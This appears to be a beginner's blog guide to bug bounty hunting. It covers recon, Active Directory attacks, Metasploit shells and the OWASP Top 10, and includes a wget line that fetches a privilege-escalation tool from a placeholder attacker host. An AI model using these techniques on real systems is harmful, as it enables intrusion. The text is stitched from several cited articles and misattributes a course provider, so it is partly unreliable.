Hello All Hackers !! Here is a guide to get started with Bug Bounty

Hello All Hackers !! Here is a guide to get started with Bug Bounty

Photo by Pawel Czerwinski on Unsplash

A bug bounty program is a deal offered by many websites and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to exploits and vulnerabilities. These programs allow the developers to discover and resolve bugs before the general public is aware of them, preventing incidents of widespread abuse.

Some are completely new to the idea of web development with little prior programming experience, some are experienced web developers with no experience in cybersecurity while some are highly skilled cybersecurity professionals. The steps that should be taken are the same for everyone, one can, however, skip one or more steps based on his/her skills and experience.

Let’s get started with these steps:

1. Learn Computer Networking:

A decent knowledge of Computer Networks is very much necessary for getting started with the bug bounty. Though you’re not required to have expertise in the computer networking domain to get started with bug bounty — but you should be proficient at least with the fundamentals of inter-networking, IP addresses, MAC addresses, OSI stack (and TCP/IP stack), etc. You can learn it from some of the quality online resources like GeeksforGeeks Computer Networks.

2. Get Familiarized With the Web Technologies: This includes getting a basic understanding of web programming and web protocols. Web programming languages are JavaScript, HTML, and CSS. A beginner to intermediate level proficiency with these languages is more than enough in the beginning. The protocols you should learn about are HTTP, FTP, TLS, etc. These can be learned from the corresponding RFCs or from numerous offline or online resources available over the web.

3. Learning Web Application Security Measures and Hacking Techniques: This will include learning about common security mechanisms, security practices, their bypasses, common vulnerabilities in web applications, ways to find these vulnerabilities, and ways to patch and prevent the applications from these vulnerabilities. Useful resources are:

  • Recommended Books:
  • Web Application Hacker’s Handbook
  • Mastering Modern Web Application Penetration Testing
  • Web Hacking 101

4. Practicing and Polishing Your Skills: Practicing helps in developing a framework for approaching a target. The more you practice on diverse targets of different difficulty levels the easier it will be for you to approach a web application in a way that increases your chances of finding a critical vulnerability (or even finding a vulnerability if the application is well secured and has been already tested by many hunters). Try making great use of these resources:

  • Vulnerable Web Applications: These are intentionally vulnerable virtual machines or web app packages. Vulnerable web applications are available as general variants that contain many types of vulnerabilities and as dedicated variants that focus on a single vulnerability and its subtleties. Some examples are:
  • BWapp
  • DVWA
  • OWASP Webgoat
  • Cyclone Transfers
  • Bricks
  • Butterfly Security Project
  • Hacme
  • Juice Shop
  • Rails Goat
  • SQLol
  • BWapp, DVWA(Damn Vulnerable Web Application), and Webgoat are the best for beginners.

5. Testing Real Targets: After you are thorough with your basics and have a decent level of skill, you can start doing the actual hunting on real websites. A lot of websites run bug bounty programs for their web assets. Some big names are:

  • Facebook
  • Twitter
  • Google
  • Verizon
  • Starbucks
  • Shopify
  • Spotify
  • Apple

These companies reward generously but finding a security bug on any of their assets is highly difficult due to tough competition. You must remember that the top bug bounty hunters of the world are testing these websites along with you. However, that doesn’t mean you can’t find something at all.

6. Staying Current on Latest Vulnerabilities: For this, you can follow elite researchers and learn from their work. You can also read disclosed reports on bug bounty platforms like HackerOne. Some recommended researchers to follow are:

  • Frans Rosén
  • Jason Haddix
  • Geekboy
  • PortSwigger
  • Jobert Abma

You need to know that if you really want to get started with bug bounty then it doesn’t matter what is your academic background or what is your current working domain — you simply can start learning the required skills and tools and start doing the actual hunting!!

Different types of programs

Vulnerability Disclosure Program (VDP)

  • Typically these programs are public and only reward you with points and nothing more, however some VDP’s are also private. Most people starting in bug bounties are told to start with VDP’s to ‘learn the ropes’ and to build ‘rep’ (reputation) to receive privates invites which pay, but what most researchers don’t realise is some of these VDP programs actually have paying programs as well, they are just private and invite only.
  • With that said, not all companies are able to run more than a VDP for a variety of reasons such as being a charity. Just because a company is using a VDP doesn’t mean you should ignore them, it means just be mindful about who you are working with and their reasons for running a VDP, then decide if you should spend on their program. Practising on VDP’s can be a great way to get first-hand experience for what it’s like to participate in bug bounties and hack blindly on real world websites. It is also not unheard of to be invited to a company’s paying program after “impressing” them in their VDP, however this depends on your risk vs. reward ratio. You’re the shot caller.

Public Bug Bounty Program

  • A public bug bounty program such as Google & Facebook that is open to the world and reward money. There are LOTS of public bug bounty programs out there and some even have wide scopes. You can discover public programs from Disclose.IO, however also make sure to search on Google to discover more companies which welcome hackers. You can find google dorks below to help find programs.
  • Most people are under the illusion that just because a program is public that there will be nothing to find. False! New code and new features are pushed daily, especially if it’s a large company spanning across the world!
  • You also have to consider that if most researchers are avoiding these programs because they think too many eyes are on there, surely there isn’t as many eyes as they actually think? Get creative, there are bugs out there.

Private Bug Bounty Program

  • Typically most private invites you receive will be paying programs, however not all private programs do pay. You can usually customise your invite preference on bug bounty platforms if you want to filter paying private vs. non-paying. Researchers are usually invited to private programs after showing some activity on the platform such as a certain amount of valid bugs, certain rep/signal/impact value and activity in x amount of days.
  • You may hear some researchers refer to “VIP” and “secret” programs and these are programs setup by certain companies to work only with hackers they select. There is not usually a public criteria to join one of these and you are mostly selected based on your activity on their other program(s) & your skill.

Notice Board: Google has lots of information indexed that can help you find external programs as well as information relating to your specified company. There are lots of queries you could search for, however here are some popular search queries: (don’t forget to try different languages!).

inurl:responsible disclosure

"report security vulnerability"

"vulnerability disclosure"

"responsible vulnerability disclosure"

diclose vulnerability "company"

"powered by hackerone" "submit vulnerability report"

indesc:bug bounty|vulnerability disclosure

inurl: bug bounty

"vulnerability reward"

white hat program

"vulnerability reporting policy"



Start with Methodology because I think building your Methodology is one of the most important things. It helps to stay organized and going through a certain set of steps helps me. On every CTF that you practice on, you will refine your Methodology .

If you want to learn about Methodology, check out Jason Haddix’s video. There are tons of material out there regarding the Hacking methodology.

The importance of Notes

Taking good notes is very important.

Taking good notes as Hacker / Pentester / Bug Hunter is crucial. You will work with your Notes open at all times.

Own your notes, keep them organized, refine them and learn to love them.


Learn a ton about doing good reconnaissance. The more stuff you gather the easier it is for you to get access. If you slack in recon, you’ll struggle at executing later.

Passive Reconnaissance Tools

Target Validation

  • WHOIS Lookup
  • nslookup
  • dnsrecon

Subdomain Enumeration


  • Nmap
  • Wappalyzer
  • WhatWeb
  • BuiltWith
  • Netcat

Data Breaches

That’s a lot of stuff to wrap your head around. You pick what works for you and integrate it into your Methodology.

Active Directory

Let me summarize:

General AD Stuff

  • The AD DS Data Store
  • Ntds.dit file (Hashes passwords)

SAM Hashes

  • Local User hashes


  • How Kerberos works

Top Five Ways to get Domain Admin before Lunch

Domain Enumeration

  • PowerView

Gaining Domain Access

Downloads Domain Data & Visualizes it. Very useful.

Pass the Hash Attacks

  • NTLM vs NTLMv2
  • NTLM hashes can be passed, NTLMv2 hashes not!


  • Only works if credentials are available. Tool passes the password to other services/machines.
  • Using psexec.py to connect with the gathered hash


  • Used to dump hashes

Mitigation of Pass The Hash attacks

  • Limit Account Re-Use
  • Strong Passwords
  • Privilege Access Management

Token Impersonation

What are tokens?

Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. “Cookies for computers”

Token Impersonation Attack

  • Requires a Username + Password of any machine


  • Using Impacket
  • Needs User Account with Credentials to work. It doesn’t need to be an Admin account.

GPP / cPassword Attacks

  • Always worth checking for, especially on older Servers.
  • Metasploit Module -> auxiliary/smb_enum_gpp


  • Tool used to Dump Hashes of all kind
  • SAM Hashes
  • Golden Ticket Attacks

Active Directory is a huge topic on its own. You have to go through a course to fully understand all of it.


I don’t know how else to call this, but I feel like this deserves its own section. Running manual exploits usually leaves you with dumb shells, which you generally want to elevate to beautiful shells. I learned a lot about this and it is extremely helpful to have a fully interactive shell compared to a dumb one.

This is an excellent Article about Upgrading Simple Shells to Fully Interactive ones by Ropnop. Read it.


Elevate Dumb Shell to Meterpreter Shells

  • After a dumb shell was created with a Metasploit Exploit hit CTRL + Z to move the shell to the background
  • Type: sessions and note the session ID
  • Type: sessions -u 1 -> This spawns a meterpreter shell if available
  • Type: sessions -i 2 -> To use the newly spawned meterpreter shell

Reverse Shell vs Bind Shell

  • Reverse Shell
  • Target connects to attacker
  • Bind Shell
  • Attacker connects to target

If Username + Password are available

  • Create Meterpreter Shell from scratch with exploit/windows/smb/psexec


Can also be used to create Shells

  • smbexec
  • wmiexec
  • psxec

Transferring Files

When exploiting servers, you will most likely find yourself in a situation where you want to either upload a tool or an exploit to a server or, download files from the server to your attacking machine. I learned a couple of techniques that help you with that.

  • SimpleHTTPServer
  • Pre-installed on Kali
  • Starts an HTTP Server on Port 8000 in the current directory which can be accessed from other hosts on the network to transfer files.
  • You can use: wget http://ipofattacker:8000/unix-privesc-check.tar to download files
  • Certutil
  • Pyftpdlib
  • SSH

I like this method a lot if you have an SSH user to the target

  • scp /path/to/file username@IP:/path/to/destination
  • use pwd on target to see the correct directory


Now to the fun part. You can put your focus on Web because you want to get started with Bug Bounties. Burp should be a part on its own because it is so widely used in Web Application testing, but I’ll try to summarize as best as I can. I upgraded to Burp Pro since my trial has expired. You can use the free community edition with limited functionality, which is perfectly fine for the beginning.

The OWASP Top Ten

The OWASP TOP 10 is a list of the Top 10 Web Application Security Risks. The OWASP Top 10 are going to be a part of every interview you are going to participate it. I actually just went through one, they asked a ton of OWASP questions. I knew I needed to at least understand the OWASP Top Ten on a high level, so once again, the Cyber Mentor’s course helped me ton to understand them, as he goes over every one of them.

1 — SQL Injection

  • Testing for SQL injection using Burp Intruder
  • Logging in as the admin without authentication using SQL Injection (So much fun)
  • Learning about SQL Injection Payloads and how to use Intruder to test for them
  • Learned how to prevent SQL Injection

2 — Broken Authentication

  • Enumerate users or emails through improperly configured login forms
  • Abuse forgot password forms for user enumeration

3 — Sensitive Data Exposure

  • Looking through all kinds of folders on a website in Burp
  • Searching for Keys
  • Checking Security Headers
  • Testing SSL with Nmap’s ssl-enum-ciphers script

4 — XXE (XML External Entities)

  • XXE Payloads
  • Trying XML payload uploads and checking burp what is returned
  • How to prevent XXE

5 — Broken Access Control

  • Checking HTML code for hidden forms or fields, etc.
  • Unauthenticated access to restricted areas

6 — Security Misconfiguration

  • One of the most common issues
  • Result of insecure configurations
  • Outdated libraries or services

7 — XSS (Cross-Site Scripting)

  • I ❤ XSS
  • XSS Payloads
  • How to test for XSS using Burp
  • Different Types of XSS (Stored, Reflected, DOM)
  • How to prevent XSS

8 — Insecure Deserialization

  • Rather uncommon and hard to exploit
  • Leads to RCE

9 — Using Components with Known Vulnerabilities

  • Learned how to scan for those using Burp extensions
  • Struts 2

10 — Insufficient Logging & Monitoring

  • Can be exploited to maintain system access or pivot through the system
  • Brute Force undetected
  • Failing to detect breaches

Knowing the OWASP Top 10 is essential for doing Bug Bounties. Period. You have to have those down and then take your study further from there.

Other Web Stuff

  • Burp Suite
  • Most popular tool for Bug Bounties (literally everyone uses Burp)
  • General Stuff
  • Learned all the basic functionality
  • Learned what all the different tabs are doing
  • Learned how to read traffic
  • Learned about scopes
  • Learned how to recognize successful fuzzing attempts


  • Burp Intruder can be used to attack all kinds of forms
  • You can run brute-force attacks using Burp Intruder
  • You can test for XSS, SQL Injection and Fuzz all the things with Intruder
  • Credential Stuffing


  • Repeater allows you to modify requests and send them to the server


  • Lots of Burp Addons are available to install


  • Allows you to decode stuff (base64 for example) right in Burp

I feel like this is just a small part of what Burp is, but it would get out of hand to put everything in here now. I will add to it in the following Blog posts in greater detail.

Directory Brute-Force

  • Using Gobuster or Dirbuster
  • Very important to find hidden files, dev sites, or generally get an overview of a websites folder hierarchy

Subdomain Enumeration

  • As previously mentioned in Passive Reconnaissance — Very important in Bug Bounties to find hidden subdomains, dev subdomains etc.
  • Owasp Amass
  • Sublist3r
  • crth.sh
  • Assetfinder
  • Httprobe
  • Gowitness

Enumerating Web Tech

  • How websites are built
  • Wappalyzer Firefox Addon
  • WhatWeb (Kali Tool)

Now there is a lot more I could go over, but I feel like it makes more sense going a bit more in-depth into those topics in future blog posts.

One last thing I want to mention tho is what I have learned from Hackthebox within this time.

Stuff you can learn from Hackthebox

Use Hackthebox almost exclusively for practice resource next to actual Bug Bounties.

Because this post is already becoming a behemoth and potentially the longest article I have written on here, I will keep the last month’s “what I’ve learned from Hackthebox” in an easily digestible bullet point format.

Privilege Escalation


Learn what Redis is and how to exploit it

SSH keys

  • Learned a ton about SSH keys and how to exploit them
  • Also learned how to crack them if a weak password is used


  • Learned how to use manual exploits
  • Learned how to read exploits
  • Learned that I need to decode some exploits so they work on Linux with dos2unix
  • Example on Kali: dos2unix 47681.sh


  • Learn how Bash exploits use ${} placeholder values


  • Enumerate all the things.
  • If you are stuck
  • Enumerate some more
  • Look through all folders on a Server
  • Check .ssh folders
  • Check /opt/ folders
  • Check /home/ folders
  • Check folders and config files of installed services

Did I mention to enumerate some more?

Password Cracking

  • Cracking all kinds of passwords using tools like
  • Hashcat
  • JohnTheRipper
  • Hydra
  • Burp Suite

Brute Forcing stuff on CTF’s

  • …Is mostly pointless


  • Learned how Searchsploit works and how useful it is

Searching for Exploits

  • Google all the Server/Service versions you find through enumeration and look for exploits
  • The key to easy CTF’s


  • Learned a ton about SMB
  • nmblookup
  • smbclient
  • nmap
  • rpcclient
  • enum4linux
  • smbmap

Great read on SMB and a great workflow

Ethical Hacking Courses

My favorite Ethical Hacking Courses are the ones created by StationX, who is more widely known as The Cyber Mentor. No course that I have taken online has advanced my skills more than his excellent Ethical Hacking Course, hands down.

Some other great courses are:




There is also an option to get access to all courses $149 per year. I can’t recommend StationX enough.

Does this ever end?

Even though I already spent five hours writing this blog post, I feel like we are just scratching the surface. I probably have forgotten to mention several things I’ve learned, but I felt like I needed to initiate this whole series with as much detail as I could.

The next posts will be much more in-depth and we will be going more technical on all the different things.

I hope that this series will find someone’s interest, and in the best, motivate some of you to get started as well. I’m not gonna lie, it is hard. It is hard, but with this blog, I want to show you that it’s possible if you put in the work. I do not come from a background of higher education, I learned everything I know by myself and with the help of the incredible Hacking community. Now is the time to give back, and I hope I can achieve this through this blog.

Notice : Some links might be affiliate . If you purchase anything by clicking , i might receive a commission .

Reference :

[How to Get Started With Bug Bounty? - GeeksforGeeks
Bug Bounty programs are a great way for companies to add a layer of protection to their online assets. A bug bounty…geeksforgeeks.org](https://www.geeksforgeeks.org/how-to-get-started-with-bug-bounty/ "geeksforgeeks.org/how-to-get-started-with-b..")

[Learn how to get started in bug bounties | BugBountyHunter.com
Vulnerability Disclosure Program (VDP) Typically these programs are public and only reward you with points and nothing…bugbountyhunter.com](https://www.bugbountyhunter.com/getting-started/ "bugbountyhunter.com/getting-started")

[How to get started with Bug Bounties
In this article, you will learn how to get started with Bug Bounties, or, how I got started with Bug Bounties. I will…ceos3c.com](https://www.ceos3c.com/security/get-started-with-bug-bounties/ "ceos3c.com/security/get-started-with-bug-bo..")

Want to say Hi to me ? Here is my linkedin .

Did you find this article valuable?

Support Cyber Aeronautycs Ltd. Blog by becoming a sponsor. Any amount is appreciated!